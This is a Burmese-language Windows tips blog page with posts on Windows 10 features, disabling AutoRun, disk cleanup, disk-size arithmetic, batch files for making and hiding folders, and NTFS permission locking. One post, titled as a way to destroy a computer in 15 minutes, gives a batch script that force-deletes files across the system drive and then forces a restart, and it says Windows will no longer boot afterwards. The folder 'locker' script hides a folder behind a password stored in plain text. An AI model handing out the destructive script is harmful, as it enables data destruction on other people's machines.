img { -webkit-transition: all 1s ease-in-out; -moz-transition: all 1s ease-in-out; -o-transition: all 1s ease-in-out; transition: all 1s ease-in-out; } img:hover { -webkit-transform:rotate(1080deg); -moz-transform: rotate(1080deg); -o-transform: rotate(1080deg); -ms-transform: rotate(1080deg); transform: rotate(1080deg); } -->

Blogger templates

DipCs18@IT Sharing မှ ကြိုဆိုပါသည်...

Tuesday, May 19, 2020

Windows 10 ရဲ့ အားသာချက်များ





Windows 10 တင်ဖို့ CPU-i3, 3rd, 4th Gen, RAM-DDR3 4 GB လောက် အနည်းဆုံးရှိမှ အောက်မှာရေးထားတဲ့ အကြောင်းအရာတွေနဲ့ အဆင်ပြေနိုင်ပါလိမ့်မယ်။ စက်က အရမ်းနိမ့်နေပြီး Windows 10 ကို ကောင်းကောင်း အသုံးပြုချင်လို့မရပါဘူး။  i5-6th, 7th Gen, RAM 4GB ရှိတဲ့ စက်တွေတောင် အသုံးပြုတာများနေရင် ကြာနေရင် ဟန်းနေတတ်ပါတယ်။
1.       CPU, RAM, Motherboard, Model တူ ကွန်ပျူတာ နှစ်လုံးကို တစ်လုံးမှာ Windows 10 တင်ပြီး နောက်တစ်လုံးမှာ Windows 7, 8, 8.1 Version တစ်ခုကို ပြိုင်တူတင်ကြည့်လိုက်ပါ။ပြီးရင် အချိန် Timer ပေးထားလိုက်ပါ။ 2017 ခုနှစ်နောက်ပိုင်းထုတ် Windows 10 Version တွေဆိုရင် Windows 7, 8, 8.1 တွေထက် Install လုပ်ရတာပိုမြန်ဆန်ပါတယ်။ မယုံရင်စမ်းကြည့်လိုက်ပါ။
2. Windows တင်ပြီးပြီးချင်း လုပ်ဆောင်ရတာကတော့ လိုအပ်တဲ့ Driver တွေ ထည့်ရတာပါပဲ။ Windows 7, 8, 8.1 တွေဆိုရင် စက်ရဲ့မှုရင်းခွေမရှိရင် ဆော့ဝဲလ်တစ်ခုနဲ့ထည့်ရတာ၊ USB Driver မသိလို့ ဒုက္ခရောက်တာ၊ ဘာ Driver ဆော့ဲလ်ပဲ ထည့်ထည့်၊ Network Driver မကိုက်လို့ ထည့်မရတာ အစရှိတဲ့ပြဿနာတွေ ရှိကောင်းရှိနိုင်ပါတယ်။ ဒါပေမယ့် Windows 10 နောက်ပိုင်းထုတ် Update Version တွေမှာတော့ Driver အားလုံးနီးပါးကို ထပ်ထည့်စရာမလိုအောင် Windows 10 နဲ့အတူ ပါဝင်ပြီးသားဖြစ်ပါတယ်။ Display Driver လောက်ပဲ မသိတာ တစ်ခုနှစ်ခုလောက်ရှိပါတယ်။
3. Windows 10 မှာ ကွန်ပျူတာ Settings တွေ ပိုစုံလာတယ်။ Windows 7, 8, 8.1 တွေမှာတော့ ကွန်ပျူတာ Settings တွေ သီးသန့်ကြီး မပါဝင်ပါဘူး။ Windows 8, 8.1 မှာပါတာကလည်း သိပ်မစုံပါဘူး။ Windows 10 မှာတော့ တစ်ခုခုပြင်ဆင်ချင်တာရှိရင် Windows Key + I ကို တွဲနှိပ်လိုက်တာနဲ့ Settings ထဲကိုရောက်သွားမှာပါ။ Settings ထဲကိုဝင်တဲ့ နည်းလမ်းများစွာရှိပါသေးတယ်။
4. Windows 10 မှာ Windows 7, 8, 8.1 တွေမှာ မပါဖူးသေးတဲ့ Features အသစ်ဆန်းများစွာပါဝင်တယ်။ ပုံမှန် Desktop လို မသုံးချင်ရင် Tablet Mode ကို ပြောင်းသုံးနိုင်တယ်။ Windows 10 အတွက် သီးသန့်ထုတ်ထားတဲ့ Microsoft Store မှာ ဒေါင်းလုဒ်ဆွဲရတဲ့ Application တွေရော၊ Windows 10 တင်ပြီးတာနဲ့ Built in ပါဝင်လာတဲ့ Application များစွာရှိပါတယ်။ 2018 နောက်ပိုင်းထုတ် Update Version တွေမှာတော့ တစ်ကိုယ်ရေသုံးကွန်ပျူတာတွေအတွက် အရမ်းအသုံးဝင်တဲ့ App တွေရှိပါတယ်။ Photoshop ဆေ့ာဝဲလ်မလိုတဲ့
အထိ 3D Photos ဆေ့ာဝဲလ်တွေ ပါဝင်လာပါတယ်။ Features အသစ်အဆန်းတွေကြောင့် Windows 10 အသုံးပြုရတာ ပိုလွယ်ကူပါတယ်။ အသံနဲ့ထိန်းချုပ်ပြီး အသုံးပြုရတဲ့ Cortana, ကိုယ်အသုံးပြုခဲ့တာတွေကို နောက်ကြောင်းပြန်ကြည့်လို့ရတဲ့ Task View, ရှိသမျှဆော့ဝဲလ်တွေကနေ Notification တွေ ဝင်လာအောင် လုပ်လို့ရတဲ့ Action Center, ပုံဆွဲဝါသနာရှင်တွေအတွက် Windows Ink, Sketchpad, Paint 3D, အင်္ဂလိပ်စာသီးသန့်ဖတ်ဖို့မြန်ဆန်တဲ့ Edge Browser, ဖုန်းနဲ့အလွယ် တကူချိတ်ဆက်ပြီး ပုံတွေ ပို့ Edit လုပ်နိုင်တဲ့ Your Phone အစရှိတဲ့ Application ပေါင်းများစွာရှိပါတယ်။
5. Windows 7,8,8.1 တွေထက် Windows 10 မှာ Security ပို ကောင်းလာပါတယ်။ Anti-Virus ဆေ့ာဝဲလ်တွေ မလိုတဲ့အထိ Windows Security ကောင်းလာပါတယ်။ Microsoft ကမသိတဲ့ App တွေကို ထည့်ချင်ရင် Security ထဲဝင်ပြီး Allow လုပ်ပေးရတယ်။ ဘက်ထရီအားနည်းနေတာ၊ Brightness များလွန်းနေတာ၊ Device Performance Health မကောင်းတာတွေကအစ အကုန်စစ်ပါတယ်။ Windows 10 Update Version တွေမှာ Ransomware အတွက် သီးသန့်Security ပါဝင်ပါတယ်။ ကျနော်တို့ကWindows Security ကို အမြဲ Update လုပ်ပေးနေလို Anti-Virus ဆေ့ာဝဲလ်တွေ မသုံးပါဘူး။ တစ်ချို့က Windows Security (အရင်က Windows Defender)ကို သိပ်မစွမ်းလို့မကောင်းဘူးပြောကြပါတယ်။ မစွမ်းလို့မဟုတ်ပါဘူး။ မသုံးတတ်သေးလို့ မကောင်းဘူးပြောတယ်ထင်တယ်။ Microsoft က အားယားနေလို့ Windows Security(အရင်က Windows Defender)ကို ထုတ်လုပ်ထားတာ မဟုတ်ပါဘူး။ နောက်ပြီး ကွန်ပျူတာတစ်လုံးထဲမှာ ရှိသမျှ Anti-Virus ဆေ့ာဝဲလ်တွေ ထည့်ထားလို့လည်း ဖြစ်နိုင်တယ်။ ဝယ်သုံးရတဲ့ Anti-Virus ဆေ့ာဝဲလ်တွေထက် အလကားသုံးရတဲ့ ကွန်ပျူတာရဲ့ မှုရင်း Windows Security ကို အမြဲ Update လုပ်ပြီး အသုံးပြုရင် မိမိကွန်ပျူတာလုံခြုံမှုရှိနိုင်ပါတယ်။

Sunday, May 17, 2020

Auto Run မတက်အောင် Disable ပေးနည်း...


ကျွန်တော်လည်းသေချာမသိပါဘူး။ တချို့ပြောတာကြားဖူးလို့ပါ။ USB Flash Drive တပ်ရင် Virus ကူးတာက Auto Run ကြောင့်လို့ပြောပါတယ်။ Auto Run မတတ်အောင် Disable ပေးမယ်ဆိုရင် ....
၁။ Click Start ပြီးတော့ Run ကိုသွားလိုက်ပါ
၂။ Type > gpedit.msc နောက် OK ပေးလိုက်ပါ
၃။ Group Policy window ပွင့်လာခဲ့ရင် ဘယ်ဘက် Pane အောက်ဆုံးက Administrative Templates ကို double-click လုပ်လိုက်ပါ
၎။ ညာဘက် Pane ထဲက System ကို double-click လုပ်လိုက်ပါ
၅။ Scroll down နဲ့ Turn Off Autoplay ကိုရှာပြီး double-click လုပ်လိုက်ပါ
၆။ Turn Off Autoplay Properties window မှ Enable ကို ရွေးလိုက်ပါ။ Turn Off Autoplay on မှ All drives ကို Selected လုပ်ပြီး OK ပေးလိုက်ပါ
၇။ Group Policy ကိုပိတ်လိုက်ပါ
၈။ Click Start ပြီးတော့ Run ကိုသွားလိုက်ပါ
၉။ Type > regedit နောက် OK ပေးလိုက်ပါ
၁၀။ ဘယ်ဘက် Pane ထဲက HKEY_CURRENT_USER>Software>Microsoft>Windows>CurrentVersion>Policies> Explorer ကိုရှာလိုက်ပါ
၁၁။ Explorer ကို Selected လုပ်ပြီး ညာဘက် Pane ထဲက NoDriveTypeAutoRun အပေါ် right click လုပ်ပါ Modify ကိုရွေးလိုက်ပါ. Base မှာ Hexadecimal မဟုတ်ရင် ပြန်ရွေးလိုက်ပါ
၁၂။ Value မှာ 95 လို့ရေးပြီး OK ပေးလိုက်ပါ။ မှတ်ချက်။ ။ 95 လို့ရေးပေးလိုက်တာကတော့ Removable/USB Drive တွေကို Disable ပေးတာပါ. ဒါပေမယ့် CD Drive ကိုတော့ ခွင့်ပြုထားပါတယ်။ ၂ခုစလုံးကို ခွင့်မပြုချင်ဘူးဆိုရင်တော့ 95 အစား b5 လို့ရေးလိုက်ပါ
၁၃။ ပြီးရင်တော့ Registry Editor ကိုပိတ်လိုက်ပါ
၁၄။ ကွန်ပျူတာကို Reboot လုပ်ဖို့လိုပါတယ်။ အဲဒါမှ အကျိုးသက်ရောက်မှုရှိမှာပါ။

ကွန်ပျူတာကို ဘယ်လို ထိန်းသိမ်းမလဲ


 ကျွန်တော်ပြောမဲ့ ပြဿနာလေးတွေကို ရင်းရင်းနှီးနှီး ကြားဖူးကြပါမှာ။ ဘာပြဿနာတွေလည်းဆိုတော့ Hard disk က ကလစ်ကလစ် (သို့) ဂစ်ဂစ်နဲ့ အသံတွေမြည်နေတယ်။  CPU usage တွေ အများနေတယ်။ နောက် Folder တစ်ချို့ဖွင့်လို့မရဘူးဆိုတာတွေပါ။ ဘာလို့ ဒါတွေဖြစ်တာလည်းဆိုတော့ ကျွန်တော် အလွယ်ဆုံးဖြေရရင် ဘာမျှ မပြုပြင်လို့ ဖြစ်တာလို့ ပြောရမှာပါ။ ဒါဆို ဘာလို ပြုပြင်ရမလဲ။ပထမဆုံး ကျွန်တော် Disk Cleanup လုပ်ပါတယ်။ Disk Cleanup လုပ်ဖို့ ကိုယ်လုပ်ချင်တဲ့ partition ကို right click > properties > General tab ထဲက Disk Cleanup button ကို click လုပ်ပါတယ်။ scanning လုပ်နေတာကို ခဏစောင့်ပါ။ကိုယ် delete လုပ်ချင်တဲ့ ဟာတွေကို အမှန်ခြစ် ခြစ်ပြီး OK button ကို click လုပ်ပါ။ ဒါဆိုရင် တကယ်လုပ်ချင်တာလားလို့ သေချာအောင်ထပ်မေးပါလိမ့်မယ်။ Yes button ကို click လုပ်ပါ။ ကိုယ်ဖျက်တဲ့ ဖိုင်size ကို လိုက်ပြီး အချိန်ကို စောင့်ရပါလိမ့်မယ်။ ပြီးသွားရင် cleaning လုပ်နေတဲ့ dialog box ပျောက်သွားပါလိမ့်မယ်။
ဒုတိယအနေနဲ့ error checking ကို လုပ်ပါမယ်။ error checking ကိုလုပ်ဖို့ ကိုယ်လုပ်ချင်တဲ့ partition ကို right click > properties > Tool tab ထဲက Check now button ကို click လုပ်ပါတယ်။  dialog box က Check disk option မှာ option နှစ်ခုလုံးကို mark လုပ်ပြီးရင် start button ကို click လုပ်ပါတယ်။ တကယ်လို့ ကျွန်တော်တို့ error checking လုပ်ချင်တဲ့ partition ဟာ error များရင်ဘဲ ဖြစ်ဖြစ်၊ system(window) တင်ထားရင်ဘဲ ဖြစ်ဖြစ် dialog box တစ်ခု ကျလာပါလိမ့်မယ်။  ဒီ dialog box က ကျွန်တော်တို့ လုပ်ချင်တဲ့ error checking ကို နောက်တစ်ကြိမ် restart လုပ်ရင် လုပ်မယ်ဆိုတာကို လက်ခံ/လက်မခံကို မေးတာပါ။ မတတ်နိုင်ဘူးလေ။ ကိုယ်က လုပ်ချင်နေတာကိုး။ နောက်တစ်ကြိမ် restart လုပ်မှ error checking လုပ်မယ်ဆိုတာကို လက်ခံရမှာပေါ့။ ဒီတော့ Yes button ကို click လုပ်ပါတယ်။ တကယ်လို့ ကျွန်တော်တို့ error checking လုပ်ချင်တဲ့ partition မှာ error ကလည်း များများစားစားမရှိဘူး၊ window ကလည်း တင်မထားဘူးဆိုရင် တစ်ခါတည်း error checking ကို လုပ်ပါလိမ့်မယ်။ အဲဒီမှာ အဆင့် (၅) ဆင့်လုပ်ပါတယ်။
တတိယအဆင့်အနေနဲ့ defragmentation ကို လုပ်ပါမယ်။ defragmentation ကို လုပ်ဖို့ ကိုယ်လုပ်ချင်တဲ့ partition ကို right click > properties > Tool tab ထဲက defragment now button ကို click လုပ်ပါတယ်။ အဲဒီအခါ defragment dialog box ကျလာပါတယ်။ ရှေးဦးစွာ analysis လုပ်ရပါတယ်။ ဒီအတွက် analysis button ကို click လုပ်ပါတယ်။ ပြီးသွားရင် defragment လုပ်ဖို့ လို/မလို အကြံပေးတဲ့ dialog box တစ်ခုကျလာပါတယ်။ လိုသည်ဖြစ်စေ၊ မလိုဘူးပြောသည်ဖြစ်စေ defragment button ကို click လုပ်ပါတယ်။ ကျွန်တော်ကတော့ ခပ်ပျင်းပျင်းကောင်ဆိုတော့ analysis button ကို မနှိပ်တော့ဘဲ တစ်ခါတည်း defragment button ကို တန်းနှိပ်ပါတယ်။ ဒီလိုနဲ့ စက်မှာ ရှိတဲ့ partition အားလုံးကို အထက်မှာ ပြောထားတဲ့ အဆင့်အားလုံးလုပ်ရပါမယ်။ ကျွန်တော်စက်မှာ partition 3 ခုဘဲ ရှိပါတယ်။ ပထမဆုံး partition တစ်ခုစီကို Disk Cleanup လုပ်ပါတယ်။ တစ်ခုပြီးမှ တစ်ခုလုပ်တာပါ။ ၃ ခုလုံးလုပ်ပြီးသွားရင် Error Check လုပ်ပါတယ်။ partition ၃ ခုမှာ တစ်ခုက window တင်ထားတော့ သေချာပေါက် နောက်တစ်ကြိမ် restart လုပ်မှ လုပ်ပါတယ်။ ကျန်တဲ့ partition ၂ ခုမှာ တစ်ခါတစ်လေ start button ကို နှိပ်လိုက်တာနဲ့ တစ်ခါတည်း လုပ်ပါတယ်။ တစ်ခါတစ်လေတော့ partition တစ်ပိုင်းက  dialog box က start button ကို နှိပ်လိုက်တာနဲ့ တစ်ခါတည်း လုပ်ပေမဲ့ နောက်တစ်ပိုင်းက နောက်တစ်ကြိမ် restart လုပ်မှ လုပ်မယ် ပြောပါတယ်။ ဘာဘဲဖြစ်ဖြစ် ၃ ခုလုံးအတွက် error check လုပ်ပြီးရင် restart ချပါတယ်။ ဘာလို့လဲဆိုတော့ partition ၁ ခု (သို့) ၂ ခုက window ပြန်စမှ error check ကို လုပ်ပေးမယ် ပြောထားတာကိုး။ error check လုပ်ပြီးရင် defragment လုပ်ပါတယ်။ partition တစ်ခုပြီးမှ တစ်ခုလုပ်ပါတယ်။
ဒါဆိုရင် လုံလောက်ပါပြီ။ 
အချိန်မတိုင်မီ အကြွေစောတဲ့ hard disk တွေ မဖြစ်ရလေအောင် အထက်မှာ ပြောခဲ့တဲ့ လုပ်ငန်းစဉ်လေးတွေကို လုပ်ဆောင်ကြရအောင်။
                                       


Hard Disk Space မမှန်ခြင်း....

ဘာကြောင့် Hard Disk Space မမှန်ရတာလဲ ?


ကျွန်တော်တို့ Computer Hard Disk ဖြစ်စေ Portable Device တစ်ခု ဖြစ်စေ 2 GB အရွယ်ရှိတဲ့ Pendrive တစ်ခုက 1000 GB ခန့် နဲ့ 1TB ရှိတဲ့ Hard Disk Space က 931 GB လောက်ပဲ ဖြစ်နေတယ်ဆိုတာ ဘာကြောင့်လဲလို့ လူတော်တော်များများ စပ်စပ်စုစု တော်တော်သိချင်ကြပါတယ်…နောက်တစ်ခုက

2GB အရွယ် Drive တစ်ခုကို ဥပမာကြည့်ရအောင်။ ၄င်းမှာ Total ကိုကြည့်လိုက်တော့ 1.87GB ဆိုပြီးဖြစ်နေပါတယ်။ ဒါဆိုရင် 0.13GB သို့မဟုတ် 130 MB က ဘယ်ရောက်သွားပြီလဲ ? အနီးရောင်မျှားလေးနဲ့က 1.87 GB ပြပေမဲ့ အစိမ်းရောင်မျှားလေးကတော့ 2,014,621,696 bytes ဆိုပြီး 1 Billion ကျော်နေပါတယ်..

 အမှန်တကယ် Disk Space များကို bytes… Kilo bytes… Mega bytes… Giga bytes… Tera bytes… ဆိုပြီး တွက်ချက်တဲ့ Actual Disk Space Calculation နဲ့ ရိုးရိုး သင်္ချာဗေဒကို အခြေခံတဲ့ Simple Math Disk Space Calculation နှစ်ခုကိုကြည့်ကြရအောင်။

အမှန်တကယ် Disk တွေကို တွက်ချက်တဲ့ နေရာမှာ အထက်ပါအတိုင်းက အမှန်ပါတယ်.. ဒါပေမဲ့

ကျွန်တော်တို့တွေ အလွယ်တကူ တွက်ချက်လိုက်တာက အထက်ပါပုံအတိုင်းပါပဲ… ဒါကိုတော့ Simple Math Disk Space Calculation လို့ပဲ ခေါ်ရပါမယ်။

byte to Gigabyte Converter နဲ့ ပြောင်းကြည့်တဲ့အခါ 2GB Actual Space က 2,147,483,648 bytes ပါ။ သို့သော် Simple Math မှာတော့ 2GB ကို 2,000,000,000 bytes (2 Billion Bytes) အနေနဲ့တွက်တော့ 147,483,648 bytes (147 MB) ကွာဟနေတာပေါ့..

Simple Math Disk Space Calculation တွင် 2,000,000,000 bytes (2 Billion bytes) က 1.86 GB ပါ။ တစ်နည်းအားဖြင့် 2GB လောက်ရှိတယ်ဆိုရင် 140 MB နည်းပါး လျော့နည်းနေပါလိမ့်မယ်…

ဘာကြောင့်လဲဆိုတော့ ၄င်း Hard Disk, Portable Device တွေကို ထုတ်လုပ်တဲ့ စက်ရုံ (Manufacturer) တွေက Simple Math Disk Space Calculation ကိုအခြေခံ သုံးထားကြလို့ပါပဲ။ ဒါပေမဲ့ RAM Memory မှာတော့ အပြည့်အ၀ပါ ပါတယ်။ 1GB RAM ဆိုရင် 1024MB ဆိုပြီး အပြည့်ပေါ်ပါတယ်…

နောက်ထပ် 1TB Hard Disk တစ်ခုကိုကြည့်မယ်ဆိုလျင်လည်း 931 GB သာဖော်ပြကြောင်းပါ။….

မိမိဝယ်လိုက်တဲ့ Hard Disk or Portable Device တွေကို ၀ယ်ပြီးတဲ့အခါဘာကြောင့် အပြည့်အ၀မပေါ်တာလဲဆိုတာ ဒီလောက်ဆိုရင် သဘောပေါက်မယ်ထင်ပါတယ်။

တစ်ကြိမ်တည်းနဲ့ Folder အများအပြားဖန်တီးခြင်း

တစ်ကြိမ်တည်းနဲ့ folder အများအပြားကိုဖန်တီးနိုင်ဖို့ အတွက် batch file 
တစ်ခုကိုရေးသားပြီးတည်ဆောက်ခြင်းနည်းလမ်းလေးကိျုေဝမျှပေးသွားမှာပါ...
-Notepad ကိုဖွင့်ပါ
-@echo off လို့ ရိုက်ပြီး next line
-Set/p name=”Type folder names:” လို့ ရိုက် ပြီး next line
-Md%1\%name% လို့ ရိုက်ပြီး next line ပါ
-File ကို .bat ဆို တဲ့ entexsion နဲ့ save လုပ်ပါ
-save လုပ်ထားတဲ့ file ကိုဖွင့်ပါ
-folder name တွေတောင်းပါလိမ့်မယ်။အဲဒီအခါ folder name တွေကို
space ခြားပြီး click ပါ။(example folder 4ခု တည်ဆောက်တယ်ဆိုပါစို့ 
A B C D ဆို တဲ့ folder သုံးခုတည်ဆောက်ပြီးသားဖြစ်ပါလိမ့်မယ်။
Folder တစ်ခု အတွင်းမှာနောက်ထပ် folder တွေဖန်တီးချင်ရင်တော့
folder name တွေကြားမှာ(/) ခံပြီးရိုက်ပါ.
Folder တွေကို right-click လုပ်တဲ့အခါပေါ်ထွက်လာတဲ့ menu ထဲမှာ
 batch file ကို ထည့်သွင်းထားချင်ရင်
-My computer ကို ဖွင့်ပါ.
-Tools folder options file type ကိုရွေးပါယ
-Registered file type စာရင်းမှာ file folder ကိုရွေးပါ
-Advanced ကို click လုပ်လိုက်တဲ့ အခါ edit file type dialog box
ပွင့်လာပါလိမ့်မယ်။
New button ကို click ပါ။Action ဆို တဲ့ အကွက် ထဲမှာ context menu မှာ
ပြသ ပေးချင်တဲ့command name ကို ရိုက်သွင်းပါ။(example –Make many folders)
-Application used to perform action မှာ တော့သင့် batch file ရှိရာ
လမ်းကြောင်းကိုရိုက်သွင်းပြီး space တစ်ချက်နှိပ်ပြီး
% 1 ကိုရိုက်ထည့်ပါ။(example-C:\md.bat%1)
-OK ကို နှစ်ခါကလစ်ပြီးclose ကို ဆက်လက် ကလစ်လုပ်ပါ။
-အခုဆိုရင်တော့ သင်folder တစ်ခုခုကို right click နှိပ်ကြည့်
လိုက်ရင်သင်ထည့်ထားတဲ့ menu လေးပေါ်နေမှာဖြစ်ပါတယ်

Folder တွေကို Lock ချဖို့ Batch File တစ်ခုဖန်တီးခြင်း


တချို့သော Folder များကို လော့ချချင်တဲ့ အခါ ဆော့ဝဲ လေးတွေကို
အသုံးပြုကြရပါတယ်... အခုဟာလေးကတော့ ဆော့ဝဲမပါဘဲ Folder
လော့ချတဲ့ နည်းလေးပါ... ကဲစမ်းကြည့်လိုက်ကြရအောင်...
  1. Folder လေးတစ်ခုကို မိမိနှစ်သက်အမည်နဲ့ ဆောက်လိုက်ပါ။
  2. အဲဒီ Folder ထဲမှာ TXT ဖိုင်လေးပြုလုပ်ပြီး အောက်မှာ အ၀ါရောင်နဲ့ပေးထားတဲ့ ကုဒ်လေးတွေကို copy ကူးထည့်ပါ
cls 
@ECHO OFF 
title Folder Private 
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK 
if NOT EXIST Private goto MDLOCKER 
:CONFIRM 
echo Are you sure you want to lock the folder(Y/N) 
set/p "cho=>" 
if %cho%==Y goto LOCK 
if %cho%==y goto LOCK 
if %cho%==n goto END 
if %cho%==N goto END 
echo Invalid choice. 
goto CONFIRM 
:LOCK 
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 
echo Folder locked 
goto End 
:UNLOCK 
echo Enter password to unlock folder 
set/p "pass=>" 
if NOT %pass%== password here goto FAIL 
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private 
echo Folder Unlocked successfully 
goto End 
:FAIL 
echo Invalid password 
goto end 
:MDLOCKER 
md Private 
echo Private created successfully 
goto End 
:End
 
  ကော်ပီကူပြီးထည့်လိုက်တဲ့ ကုဒ်များထဲမှ ၂၃ ကြောင်းမြောက်မှာရှိတဲ့ password here ဆိုတဲ့နေရာလေးမှာ မိမိထည့်ချင်သော စကားဝှက်ကို ထည့်လိုက်ပါ..
  စကားဝှက်ထည့်ပြီးနောက် အဲဒီဖိုင်လေးကို Save as ကနေ locker.bat အမည်နဲ့ save လိုက်ပါ..
  ပြီးပါက Folder လေးထဲကို ပြန်ကြည့်လိုက်ပါ LOCKER ဆိုတဲ့ ဖိုင်လေးကို တွေ့ရပါလိမ့်မယ်...
  LOCKER ဆိုတဲ့ဖိုင်လေးကို ၂ချက်ကလစ်ပြီးဖွင့်လိုက်ပါ Private ဆိုတဲ့ Folder လေးကို တွေ့ရပါလိမ့်မယ်...
  ကဲ ကိုယ်ထည့်ချင်တဲ့ ဖိုင်များကို Private ဆိုတဲ့ Folder လေးထဲမှာ ထည့်လိုက်ပါ။ ပြီးရင် LOCKER ဆိုတဲ့ ဖိုင်လေးကို ကလစ်လိုက်ပါ Folder ကို လော့ချမှာလား၊ လော့မချဘူးလားဆိုတာတောင်းပါလိမ့်မယ်..
  လော့ချမယ်ဆိုရင် Y လို့ ရိုက်လိုက်ပြီး Enter နှိပ်လိုက်ပါ..
  သင်က လော့ချထားတဲ့ Folder ကို ပြန်ပြီး မြင်ချင်တယ်ဆိုပါက LOCKER ဆိုတဲ့ ဖိုင်လေးကို ပြန်ကလစ်ပြီး အပေါ်မှာ ပေးထားခဲ့တဲ့ စကားဝှက်ကိုထည့်လိုက်ပါ.. Folder လေးပြန်ပေါ်လာပါလိမ့်မယ်...

ကိုယ်ဆောက်ထားတဲ့ အရေးကြီးတဲ့ ဖိုဒါကို အခြားလူ ဖွင့်ကြည့်လို.မရ၊ Delete လုပ်လို.မရအောင်လုပ်ထားမယ်


ကိုယ်ဆောက်ထားတဲ့ အရေးကြီးတဲ့ ဖိုဒါကို အခြားလူ ဖွင့်ကြည့်လို.မရ၊ 

Delete လုပ်လို.မရအောင်လုပ်ထားမယ်....
     ပထမဦးဆုံး ကိုယ်လုပ်မယ့် ဖိုဒါက NTFS နဲ.ပိုင်းထားတဲ့ Partation ပေါ်မှာရှိရပါမယ်။ ပြီးရင် My Computer ကိုဖွင့်။Menu Bar က View Tab ကို ၀င်ပါ။ ဟိုးအောက်ဆုံးစာကြောင်း 

Use sinple file sharing ( Recommended ) ဆိုတဲ့ ချက်ဘောက်လေးကို 
အမှန်ခြစ် ဖြုတ်ပေးထားရပါမယ်။ ပြီးရင် OK နဲ.ထွက်။ ကဲစမယ် ကိုယ်ရဲ့အရေးကြီးတဲ့ 
ဖိုဒါပေါ်မှာ ညာဘက်ကလစ်နှိပ် ။ Sharing and Security ဆိုတာကိုဝင်။ Security ဆိုတဲ့

Tab မှာ Advance ကို ကလစ်နှိပ်။ ပြီးရင် အောက်နားက Inherit from parent the
 permission entries that apply to child objects. Include these with explicitly defined here ဆိုတဲ့ နေရာမှာ အမှန်ခြစ်လေး ဖြုတ်ပေးရပါမယ်။ ပြီးရင် Remove လို.ပြော။ 
Apply OK OK ပေါ့။ 
ဒါဆို ကိုလုပ်ထားတဲ့ ဖိုဒါကို ဘယ်သူမှ ဖွင့်လို.လဲရမှာ မဟုတ်သလို Delete လဲလုပ်လို.ရမှာ မဟုတ်တော့ပါဘူး။ကိုက ပြန်ဖွင့်ချင်တယ် ဆိုရင်တော့ အဲဒီဖိုဒါပေါ်မှာ ညာဘက်ကလစ်ပြန်နှိပ် sharing and security ကိုဝင် ပြီးရင် Owner ဆိုတဲ့ Tab ကို သွားပါ။ Administrator ပေါ်မှာ select မှက်ပြီး Reblace owner in subcontainers and objects ဆိုတဲ့ စာကြောင်းမှာ အမှန်ခြစ်လေး ပြန်ထည့်ပေးရပါမယ်။ ပြီးရင်တော့ OK ပေါ့။ ဒါဆိုရင်တော့ ပြန်ဝင်လို.ရပါပြီ။


Saturday, May 16, 2020

၁၅ မိနစ်နဲ့ ကွန်ပျူတာကို ဖျက်ဆီးမယ်


  Code:
  @echo off
  del %systemdrive%\-.-/f/s/q
  shutdown-r-f-t 001
ဒီ ကုပ်လေးတွေကို ကူးယူလိုက်ပြီးတော့ whatever.bat 
လို့ရိုက်ထည့်ပြီးတော့
all file types, ANSI နဲ့ save လိုက်ပါ..........
အဲဒါလေးကို open လိုက်တာနဲ့ command prompt 

ပေါ်လာပြီး စာကြောင်းများ
ဆက်တိုက်ပေါ်လာပါမယ် 15 မိနစ်ကြာတဲ့ အခါ စာကြောင်းများ 

အဆက်မပြတ်ပေါ် ခြင်းရပ်သွားပါလိမ့်မယ်
သင့်ရဲ့ကွန်ပျူတာ ဟာ သိသိသာသာ နည်းသွားပါမယ်...
hard drive usage ဟာလဲ 4MB သို့ပြောင်းလဲသွားပါမယ်...
အဲဒီလို စက်နှေးလို့ Restart ပေးလိုက်ပြီး window ပြန်
တဲ့ အချိန်မှာ..
windows could not start because the following file is missing
or corrupt:
<windows root>\system32\hal.dal>
Please re-install a copy of the above


Windows 10 ရဲ့ အားသာချက်များ

Windows 10 တင်ဖို့ CPU-i3, 3rd, 4th Gen, RAM-DDR3 4 GB လောက် အနည်းဆုံးရှိမှ အောက်မှာရေးထားတဲ့ အကြောင်းအရာတွေနဲ့ အဆင်ပြေနိုင်ပ...

Popular Posts

Aung Hein - နည်းပညာ